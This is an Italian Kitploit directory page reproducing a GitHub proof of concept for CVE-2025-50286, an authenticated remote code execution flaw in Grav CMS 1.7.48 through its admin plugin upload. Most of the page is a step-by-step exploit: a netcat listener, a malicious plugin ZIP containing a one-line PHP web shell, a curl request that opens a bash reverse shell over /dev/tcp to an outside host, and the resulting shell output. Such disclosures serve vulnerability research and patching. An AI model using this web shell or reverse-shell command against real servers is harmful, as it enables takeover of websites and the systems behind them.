Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-50286 | Kitploit
Strumenti/GitHubGitHub/binneko/cve-2025-50286
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneSviluppo Payload
GitHubbinneko/cve-2025-50286

CVE-2025-50286

Vedi Repository
211 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Grav CMS v1.7.48 / Admin Plugin v1.10.48 - RCE autenticata tramite upload di plugin (CVE-2025-50286)

Grav CMS v1.7.48 con Admin Plugin v1.10.48 è vulnerabile a Remote Code Execution (RCE) tramite la funzionalità di upload dei plugin "Direct Install", consentendo ad amministratori autenticati di eseguire codice PHP arbitrario sul server.

CVE ID

CVE-2025-50286

Riepilogo

  • Tipo: RCE autenticata (Remote Code Execution)
  • Posizione: /admin/tools/direct-install (Pannello di amministrazione > Strumenti > Installazione diretta)
  • Impatto: Esecuzione di codice PHP arbitrario e potenziale compromissione completa del sistema
  • Autenticazione richiesta: Sì (accesso amministratore)
  • Versione interessata: Grav CMS v1.7.48 / Admin Plugin v1.10.48

Prova di concetto

  1. Preparare un listener:

    root@kitploit:~
    nc -lvnp 4444
    
  2. Accedere al Pannello di amministrazione di Grav come amministratore.

  3. Andare su Tools > Direct Install

  4. Caricare un plugin ZIP malevolo (evilplugin.zip) strutturato come segue:

    root@kitploit:~
    evilplugin/
    ├── evilplugin.php         ← contains: shell_exec($_GET['cmd'])
    └── blueprints.yaml        ← minimal blueprint to pass validation
    
  5. Innescare la reverse shell:

    root@kitploit:~
    curl --get --data-urlencode "cmd=bash -c 'bash -i >& /dev/tcp/host.docker.internal/4444 0>&1'" http://<target>/
    
  6. Reverse shell ricevuta:

    root@kitploit:~
    $ nc -lvnp 4444
    Listening on 0.0.0.0 4444
    Connection received on <target-ip>
    www-data@target:/var/www/html$ whoami
    www-data
    

Componente interessato

  • Endpoint: /admin/tools/direct-install
  • Funzionalità: upload dei plugin e autoload senza validazione

Testato su

  • Debian 11
  • Apache2 + PHP 7.4
  • Grav CMS v1.7.48 (con Admin Plugin v1.10.48)

Scopritore

@binneko

Riferimenti

  • Grav CMS GitHub
  • Record CVE - CVE-2025-50286

Disclaimer

Solo per scopi educativi e difensivi.

Scarica lo strumento